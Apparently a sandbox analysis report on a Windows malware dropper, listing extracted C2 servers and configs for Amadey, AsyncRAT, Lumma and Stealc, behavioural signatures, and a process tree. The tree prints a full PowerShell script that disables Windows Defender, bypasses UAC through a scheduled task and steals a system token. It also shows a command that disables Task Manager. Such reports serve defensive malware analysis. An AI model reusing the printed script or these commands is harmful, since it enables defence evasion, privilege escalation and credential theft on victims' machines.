Analysis

  • max time kernel
    147s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    10-12-2024 14:15

General

  • Target

    996661b5a8fbcfecd25f69fc167b0700e8a37a3a92d8e99131c08f185d4c43d1.exe

  • Size

    3.1MB

  • MD5

    b8fe1fa18eeace15771486b3a5bdb659

  • SHA1

    0dc3fac958f42456c8a259118979c80c3700ecd8

  • SHA256

    996661b5a8fbcfecd25f69fc167b0700e8a37a3a92d8e99131c08f185d4c43d1

  • SHA512

    547d3ddc3d9e7c50b090c3e09c7bdbd12abe38becb36d84eb6bcdc74c52b729352ee28750c3e5e892711d18ce4913feb6bf02067f7c57870d3b1c3d8dbbc71f0

  • SSDEEP

    49152:b8X54FxMjf+YytHAaniWhY1kJrz2F0CJDLW1X:i54FxMjf+YytHAaiQYarIpI1

Malware Config

Extracted

Family

amadey

Version

4.42

Botnet

9c9aa5

C2

http://185.215.113.43

Attributes
  • install_dir

    abc3bc1985

  • install_file

    skotes.exe

  • strings_key

    8a35cf2ea38c2817dba29a4b5b25dcf0

  • url_paths

    /Zu7JuNko/index.php

rc4.plain

Extracted

Family

asyncrat

Version

Venom RAT + HVNC + Stealer + Grabber v6.0.3

Botnet

Default

C2

205.209.109.10:4449

205.209.109.10:7723

Mutex

clgbfqzkkypxjps

Attributes
  • delay

    1

  • install

    false

  • install_folder

    %AppData%

aes.plain

Extracted

Family

lumma

C2

https://impend-differ.biz/api

https://print-vexer.biz/api

https://dare-curbys.biz/api

https://covery-mover.biz/api

https://formy-spill.biz/api

https://dwell-exclaim.biz/api

https://zinc-sneark.biz/api

https://se-blurry.biz/api

https://atten-supporse.biz/api

Extracted

Family

stealc

Botnet

stok

C2

http://185.215.113.206

Attributes
  • url_path

    /c4becf79229cb002.php

Extracted

Family

lumma

C2

https://atten-supporse.biz/api

https://covery-mover.biz/api

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Amadey family
  • AsyncRat

    AsyncRAT is designed to remotely monitor and control other computers written in C#.

  • Asyncrat family
  • GCleaner

    GCleaner is a Pay-Per-Install malware loader first discovered in early 2019.

  • Gcleaner family
  • Lumma Stealer, LummaC

    Lumma or LummaC is an infostealer written in C++ first seen in August 2022.

  • Lumma family
  • Modifies Windows Defender Real-time Protection settings 3 TTPs 6 IoCs
  • Stealc

    Stealc is an infostealer written in C++.

  • Stealc family
  • StormKitty

    StormKitty is an open source info stealer written in C#.

  • StormKitty payload 1 IoCs
  • Stormkitty family
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Async RAT payload 3 IoCs
  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 11 IoCs
  • Disables Task Manager via registry modification
  • Downloads MZ/PE file
  • Uses browser remote debugging 2 TTPs 9 IoCs

    Can be used control the browser and steal sensitive information such as credentials and session cookies.

  • Checks BIOS information in registry 2 TTPs 22 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 7 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 15 IoCs
  • Identifies Wine through registry keys 2 TTPs 11 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 2 IoCs
  • Reads data files stored by FTP clients 2 TTPs

    Tries to access configuration files associated with programs like FileZilla.

  • Reads user/profile data of web browsers 3 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Unsecured Credentials: Credentials In Files 1 TTPs

    Steal credentials from unsecured files.

  • Windows security modification 2 TTPs 2 IoCs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 4 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Using powershell.exe command.

  • AutoIT Executable 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Suspicious use of NtSetInformationThreadHideFromDebugger 11 IoCs
  • Drops file in Program Files directory 7 IoCs
  • Drops file in Windows directory 1 IoCs
  • Launches sc.exe 3 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 3 IoCs
  • System Location Discovery: System Language Discovery 1 TTPs 33 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

  • Checks processor information in registry 2 TTPs 13 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 8 IoCs
  • Kills process with taskkill 5 IoCs
  • Modifies data under HKEY_USERS 48 IoCs
  • Modifies registry class 3 IoCs
  • Modifies registry key 1 TTPs 1 IoCs
  • Runs net.exe
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 7 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 32 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

Processes

  • C:\Users\Admin\AppData\Local\Temp\996661b5a8fbcfecd25f69fc167b0700e8a37a3a92d8e99131c08f185d4c43d1.exe
    "C:\Users\Admin\AppData\Local\Temp\996661b5a8fbcfecd25f69fc167b0700e8a37a3a92d8e99131c08f185d4c43d1.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Identifies Wine through registry keys
    • Suspicious use of NtSetInformationThreadHideFromDebugger
    • Drops file in Windows directory
    • System Location Discovery: System Language Discovery
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of WriteProcessMemory
    PID:4928
    • C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe
      "C:\Users\Admin\AppData\Local\Temp\abc3bc1985\skotes.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Identifies Wine through registry keys
      • Adds Run key to start application
      • Suspicious use of NtSetInformationThreadHideFromDebugger
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4420
      • C:\Users\Admin\AppData\Local\Temp\1013644001\Z9Pp9pM.exe
        "C:\Users\Admin\AppData\Local\Temp\1013644001\Z9Pp9pM.exe"
        3⤵
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        PID:4676
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 224
          4⤵
          • Program crash
          PID:3788
      • C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe
        "C:\Users\Admin\AppData\Local\Temp\1013675001\H3tyh96.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Checks computer location settings
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:3680
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -enc @ ( e c h o   o f f % ) [ 1 ]  
 s p   ' H K C U : \ V o l a t i l e   E n v i r o n m e n t '   ' T o g g l e D e f e n d e r '   @ '  
 i f   ( $ ( s c . e x e   q c   w i n d e f e n d )   - l i k e   ' * T O G G L E * ' )   { $ T O G G L E = 7 ; $ K E E P = 6 ; $ A = ' E n a b l e ' ; $ S = ' O F F ' } e l s e { $ T O G G L E = 6 ; $ K E E P = 7 ; $ A = ' D i s a b l e ' ; $ S = ' O N ' }  
  
 i f   ( $ e n v : 1   - n e   6   - a n d   $ e n v : 1   - n e   7 )   {   $ e n v : 1 = $ T O G G L E   }  
  
 s t a r t   c m d   - a r g s   ' / d / r   S e c u r i t y H e a l t h S y s t r a y   &   " % P r o g r a m F i l e s % \ W i n d o w s   D e f e n d e r \ M S A S C u i L . e x e " '   - w i n   1  
  
 $ n o t i f = ' H K C U : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s \ C u r r e n t V e r s i o n \ N o t i f i c a t i o n s \ S e t t i n g s \ W i n d o w s . S y s t e m T o a s t . S e c u r i t y A n d M a i n t e n a n c e '  
 n i   $ n o t i f   - e a   0 | o u t - n u l l ;   r i   $ n o t i f . r e p l a c e ( ' S e t t i n g s ' , ' C u r r e n t ' )   - R e c u r s e   - F o r c e   - e a   0  
 s p   $ n o t i f   E n a b l e d   0   - T y p e   D w o r d   - F o r c e   - e a   0 ;   i f   ( $ T O G G L E   - e q   7 )   { r p   $ n o t i f   E n a b l e d   - F o r c e   - e a   0 }  
  
 $ t s = N e w - O b j e c t   - C o m O b j e c t   ' S c h e d u l e . S e r v i c e ' ;   $ t s . C o n n e c t ( ) ;   $ b a f f l i n g = $ t s . G e t F o l d e r ( ' \ M i c r o s o f t \ W i n d o w s \ D i s k C l e a n u p ' )  
 $ b p a s s = $ b a f f l i n g . G e t T a s k ( ' S i l e n t C l e a n u p ' ) ;   $ f l a w = $ b p a s s . D e f i n i t i o n  
  
 $ u = 0 ; $ w = w h o a m i   / g r o u p s ; i f ( $ w - l i k e ' * 1 - 5 - 3 2 - 5 4 4 * ' ) { $ u = 1 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 2 2 8 8 * ' ) { $ u = 2 } ; i f ( $ w - l i k e ' * 1 - 1 6 - 1 6 3 8 4 * ' ) { $ u = 3 }  
  
 $ r = [ c h a r ] 1 3 ;   $ n f o = [ c h a r ] 3 9 + $ r + '   ( \       / ) ' + $ r + ' (   *   .   *   )     A   l i m i t e d   a c c o u n t   p r o t e c t s   y o u   f r o m   U A C   e x p l o i t s ' + $ r + '         ` ` ` ' + $ r + [ c h a r ] 3 9  
 $ s c r i p t = ' - n o p   - w i n   1   - c   &   { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; $ A v e Y o = ' + $ n f o + ' ; $ e n v : 1 = ' + $ e n v : 1 ;   $ e n v : _ _ C O M P A T _ L A Y E R = ' I n s t a l l e r '  
 $ s c r i p t + = ' ; i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r ) } ' ;   $ c m d = ' p o w e r s h e l l   ' + $ s c r i p t  
  
 i f   ( $ u   - e q   0 )   {  
     s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k  
 }  
 i f   ( $ u   - e q   1 )   {  
     i f   ( $ f l a w . A c t i o n s . I t e m ( 1 ) . P a t h   - i n o t l i k e   ' * w i n d i r * ' ) { s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 ;   b r e a k }  
     s p   h k c u : \ e n v i r o n m e n t   w i n d i r   $ ( ' p o w e r s h e l l   ' + $ s c r i p t + '   # ' )  
     $ z = $ b p a s s . R u n E x ( $ n u l l , 2 , 0 , $ n u l l ) ;   $ w a i t = 0 ;   w h i l e ( $ b p a s s . S t a t e   - g t   3   - a n d   $ w a i t   - l t   1 7 ) { s l e e p   - m   1 0 0 ;   $ w a i t + = 0 . 1 }  
     i f ( g p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ) { r p   h k c u : \ e n v i r o n m e n t   w i n d i r   - e a   0 ; s t a r t   p o w e r s h e l l   - a r g s   $ s c r i p t   - v e r b   r u n a s   - w i n   1 } ; b r e a k  
 }  
 i f   ( $ u   - e q   2 )   {  
     $ A = [ A p p D o m a i n ] : : C u r r e n t D o m a i n . " D e f ` i n e D y n a m i c A s s e m b l y " ( 1 , 1 ) . " D e f ` i n e D y n a m i c M o d u l e " ( 1 ) ; $ D = @ ( ) ; 0 . . 5 | % { $ D + = $ A . " D e f ` i n e T y p e " ( ' A ' + $ _ ,  
     1 1 7 9 9 1 3 , [ V a l u e T y p e ] ) }   ; 4 , 5 | % { $ D + = $ D [ $ _ ] . " M a k ` e B y R e f T y p e " ( ) }   ; $ I = [ I n t 3 2 ] ; $ J = " I n t ` P t r " ; $ P = $ I . m o d u l e . G e t T y p e ( " S y s t e m . $ J " ) ;   $ F = @ ( 0 )  
     $ F + = ( $ P , $ I , $ P ) , ( $ I , $ I , $ I , $ I , $ P , $ D [ 1 ] ) , ( $ I , $ P , $ P , $ P , $ I , $ I , $ I , $ I , $ I , $ I , $ I , $ I , [ I n t 1 6 ] , [ I n t 1 6 ] , $ P , $ P , $ P , $ P ) , ( $ D [ 3 ] , $ P ) , ( $ P , $ P , $ I , $ I )  
     $ S = [ S t r i n g ] ;   $ 9 = $ D [ 0 ] . " D e f ` i n e P I n v o k e M e t h o d " ( ' C r e a t e P r o c e s s ' , " k e r n e l ` 3 2 " , 8 2 1 4 , 1 , $ I , @ ( $ S , $ S , $ I , $ I , $ I , $ I , $ I , $ S , $ D [ 6 ] , $ D [ 7 ] ) , 1 , 4 )  
     1 . . 5 | % { $ k = $ _ ; $ n = 1 ; $ F [ $ _ ] | % { $ 9 = $ D [ $ k ] . " D e f ` i n e F i e l d " ( ' f ' + $ n + + , $ _ , 6 ) } } ; $ T = @ ( ) ; 0 . . 5 | % { $ T + = $ D [ $ _ ] . " C r ` e a t e T y p e " ( ) ; $ Z = [ u i n t p t r ] : : s i z e  
     n v   ( ' T ' + $ _ ) ( [ A c t i v a t o r ] : : C r e a t e I n s t a n c e ( $ T [ $ _ ] ) ) } ;   $ H = $ I . m o d u l e . G e t T y p e ( " S y s t e m . R u n t i m e . I n t e r o p ` S e r v i c e s . M a r ` s h a l " ) ;  
     $ W P = $ H . " G e t ` M e t h o d " ( " W r i t e $ J " , [ t y p e [ ] ] ( $ J , $ J ) ) ;   $ H G = $ H . " G e t ` M e t h o d " ( " A l l o c H ` G l o b a l " , [ t y p e [ ] ] ' i n t 3 2 ' ) ;   $ v = $ H G . i n v o k e ( $ n u l l , $ Z )  
     ' T r u s t e d I n s t a l l e r ' , ' l s a s s ' | % { i f ( ! $ p n ) { n e t 1   s t a r t   $ _   2 > & 1   > $ n u l l ; $ p n = [ D i a g n o s t i c s . P r o c e s s ] : : G e t P r o c e s s e s B y N a m e ( $ _ ) [ 0 ] ; } }  
     $ W P . i n v o k e ( $ n u l l , @ ( $ v , $ p n . H a n d l e ) ) ;   $ S Z = $ H . " G e t ` M e t h o d " ( " S i z e O f " , [ t y p e [ ] ] ' t y p e ' ) ;   $ T 1 . f 1 = 1 3 1 0 7 2 ;   $ T 1 . f 2 = $ Z ;   $ T 1 . f 3 = $ v ;   $ T 2 . f 1 = 1  
     $ T 2 . f 2 = 1 ; $ T 2 . f 3 = 1 ; $ T 2 . f 4 = 1 ; $ T 2 . f 6 = $ T 1 ; $ T 3 . f 1 = $ S Z . i n v o k e ( $ n u l l , $ T [ 4 ] ) ; $ T 4 . f 1 = $ T 3 ; $ T 4 . f 2 = $ H G . i n v o k e ( $ n u l l , $ S Z . i n v o k e ( $ n u l l , $ T [ 2 ] ) )  
     $ H . " G e t ` M e t h o d " ( " S t r u c t u r e T o ` P t r " , [ t y p e [ ] ] ( $ D [ 2 ] , $ J , ' b o o l e a n ' ) ) . i n v o k e ( $ n u l l , @ ( ( $ T 2 - a s   $ D [ 2 ] ) , $ T 4 . f 2 , $ f a l s e ) ) ; $ w i n d o w = 0 x 0 E 0 8 0 6 0 0  
     $ 9 = $ T [ 0 ] . " G e t ` M e t h o d " ( ' C r e a t e P r o c e s s ' ) . I n v o k e ( $ n u l l , @ ( $ n u l l , $ c m d , 0 , 0 , 0 , $ w i n d o w , 0 , $ n u l l , ( $ T 4 - a s   $ D [ 4 ] ) , ( $ T 5 - a s   $ D [ 5 ] ) ) ) ;   b r e a k  
 }  
  
 $ w d p = ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '  
 '   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s ' , ' \ U X   C o n f i g u r a t i o n ' , ' \ M p E n g i n e ' , ' \ S p y n e t ' , ' \ R e a l - T i m e   P r o t e c t i o n '   | %   { n i   ( $ w d p + $ _ ) - e a   0 | o u t - n u l l }  
  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r   S e c u r i t y   C e n t e r \ N o t i f i c a t i o n s '   D i s a b l e N o t i f i c a t i o n s   1   - T y p e   D w o r d   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ U X   C o n f i g u r a t i o n '   N o t i f i c a t i o n _ S u p p r e s s   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s \ S y s t e m '   E n a b l e S m a r t S c r e e n   0   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ P o l i c i e s \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 s p   ' H K L M : \ S O F T W A R E \ M i c r o s o f t \ W i n d o w s   D e f e n d e r '   D i s a b l e A n t i S p y w a r e   1   - T y p e   D w o r d   - F o r c e   - e a   0  
 n e t 1   s t o p   w i n d e f e n d  
 s c . e x e   c o n f i g   w i n d e f e n d   d e p e n d =   R p c S s - T O G G L E  
 k i l l   - N a m e   M p C m d R u n   - F o r c e   - e a   0  
 s t a r t   ( $ e n v : P r o g r a m F i l e s + ' \ W i n d o w s   D e f e n d e r \ M p C m d R u n . e x e ' )   - A r g   ' - D i s a b l e S e r v i c e '   - w i n   1  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ m p e n g i n e d b . d b ' )   - F o r c e   - e a   0                       # #   C o m m e n t e d   =   k e e p   s c a n   h i s t o r y  
 d e l   ( $ e n v : P r o g r a m D a t a + ' \ M i c r o s o f t \ W i n d o w s   D e f e n d e r \ S c a n s \ H i s t o r y \ S e r v i c e ' )   - R e c u r s e   - F o r c e   - e a   0  
 ' @   - F o r c e   - e a   0 ;   i e x ( ( g p   R e g i s t r y : : H K E Y _ U s e r s \ S - 1 - 5 - 2 1 * \ V o l a t i l e *   T o g g l e D e f e n d e r   - e a   0 ) [ 0 ] . T o g g l e D e f e n d e r )  
 # - _ - # 
          4⤵
          • Suspicious use of NtCreateUserProcessOtherParentProcess
          • System Location Discovery: System Language Discovery
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          • Suspicious use of WriteProcessMemory
          PID:4284
          • C:\Windows\SysWOW64\sc.exe
            "C:\Windows\system32\sc.exe" qc windefend
            5⤵
            • Launches sc.exe
            • System Location Discovery: System Language Discovery
            PID:928
          • C:\Windows\SysWOW64\cmd.exe
            "C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3964
          • C:\Windows\SysWOW64\whoami.exe
            "C:\Windows\system32\whoami.exe" /groups
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of AdjustPrivilegeToken
            PID:1400
          • C:\Windows\SysWOW64\net1.exe
            "C:\Windows\system32\net1.exe" start TrustedInstaller
            5⤵
            • System Location Discovery: System Language Discovery
            PID:3212
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 3680 -s 2800
          4⤵
          • Program crash
          PID:2140
      • C:\Users\Admin\AppData\Local\Temp\1013724001\d7dd7c2d24.exe
        "C:\Users\Admin\AppData\Local\Temp\1013724001\d7dd7c2d24.exe"
        3⤵
        • Identifies VirtualBox via ACPI registry values (likely anti-VM)
        • Checks BIOS information in registry
        • Executes dropped EXE
        • Identifies Wine through registry keys
        • Suspicious use of NtSetInformationThreadHideFromDebugger
        • System Location Discovery: System Language Discovery
        • Suspicious behavior: EnumeratesProcesses
        PID:4524
        • C:\Windows\SysWOW64\WerFault.exe
          C:\Windows\SysWOW64\WerFault.exe -u -p 4524 -s 1696
          4⤵
          • Program crash
          PID:6428
      • C:\Users\Admin\AppData\Local\Temp\1013725001\UkYEOVR.exe
        "C:\Users\Admin\AppData\Local\Temp\1013725001\UkYEOVR.exe"
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • System Location Discovery: System Language Discovery
        • Modifies registry class
        • Suspicious use of WriteProcessMemory
        PID:4708
        • C:\Windows\SysWOW64\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\dllnet\yLU75wsHgukerTkv.vbe"
          4⤵
          • Checks computer location settings
          • System Location Discovery: System Language Discovery
          • Suspicious use of WriteProcessMemory
          PID:3576
          • C:\Windows\SysWOW64\cmd.exe
            C:\Windows\system32\cmd.exe /c ""C:\dllnet\J0k4As.bat" "
            5⤵
            • System Location Discovery: System Language Discovery
            • Suspicious use of WriteProcessMemory
            PID:4704
            • C:\Windows\SysWOW64\reg.exe
              reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f
              6⤵
              • System Location Discovery: System Language Discovery
              • Modifies registry key
              PID:3620
            • C:\dllnet\HyperServerFontdll.exe
              "C:\dllnet/HyperServerFontdll.exe"
              6⤵
              • Checks computer location settings
              • Executes dropped EXE
              • Drops file in Program Files directory
              • Modifies registry class
              • Suspicious behavior: EnumeratesProcesses
              • Suspicious use of AdjustPrivilegeToken
              PID:4660
              • C:\Windows\System32\cmd.exe
                "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\7dRQuYw6Z5.bat"
                7⤵
                  PID:1516
                  • C:\Windows\system32\chcp.com
                    chcp 65001
                    8⤵
                      PID:2300
                    • C:\Windows\system32\w32tm.exe
                      w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
                      8⤵
                        PID:924
                      • C:\Program Files\dotnet\cmd.exe
                        "C:\Program Files\dotnet\cmd.exe"
                        8⤵
                        • Executes dropped EXE
                        • Suspicious use of AdjustPrivilegeToken
                        PID:2404
            • C:\Users\Admin\AppData\Local\Temp\1013726001\12b77bfd97.exe
              "C:\Users\Admin\AppData\Local\Temp\1013726001\12b77bfd97.exe"
              3⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Suspicious behavior: EnumeratesProcesses
              PID:2680
            • C:\Users\Admin\AppData\Local\Temp\1013727001\17c0472cd9.exe
              "C:\Users\Admin\AppData\Local\Temp\1013727001\17c0472cd9.exe"
              3⤵
              • Identifies VirtualBox via ACPI registry values (likely anti-VM)
              • Checks BIOS information in registry
              • Checks computer location settings
              • Executes dropped EXE
              • Identifies Wine through registry keys
              • Loads dropped DLL
              • Suspicious use of NtSetInformationThreadHideFromDebugger
              • System Location Discovery: System Language Discovery
              • Checks processor information in registry
              • Suspicious behavior: EnumeratesProcesses
              PID:4976
              • C:\Program Files\Google\Chrome\Application\chrome.exe
                "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory=""
                4⤵
                • Uses browser remote debugging
                • Enumerates system info in registry
                • Modifies data under HKEY_USERS
                • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of FindShellTrayWindow
                PID:3204
                • C:\Program Files\Google\Chrome\Application\chrome.exe
                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffa59a6cc40,0x7ffa59a6cc4c,0x7ffa59a6cc58
                  5⤵
                    PID:4284
                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=1912,i,14654772866708029400,5913168638431693635,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1908 /prefetch:2
                    5⤵
                      PID:4388
                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=2140,i,14654772866708029400,5913168638431693635,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2160 /prefetch:3
                      5⤵
                        PID:3132
                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2248,i,14654772866708029400,5913168638431693635,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2260 /prefetch:8
                        5⤵
                          PID:4708
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3132,i,14654772866708029400,5913168638431693635,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3152 /prefetch:1
                          5⤵
                          • Uses browser remote debugging
                          PID:400
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3172,i,14654772866708029400,5913168638431693635,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3208 /prefetch:1
                          5⤵
                          • Uses browser remote debugging
                          PID:4624
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --remote-debugging-port=9229 --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4372,i,14654772866708029400,5913168638431693635,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4540 /prefetch:1
                          5⤵
                          • Uses browser remote debugging
                          PID:436
                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4828,i,14654772866708029400,5913168638431693635,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4824 /prefetch:8
                          5⤵
                            PID:2596
                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4880,i,14654772866708029400,5913168638431693635,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4824 /prefetch:8
                            5⤵
                              PID:4320
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --remote-debugging-port=9229 --profile-directory="Default"
                            4⤵
                            • Uses browser remote debugging
                            • Enumerates system info in registry
                            • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
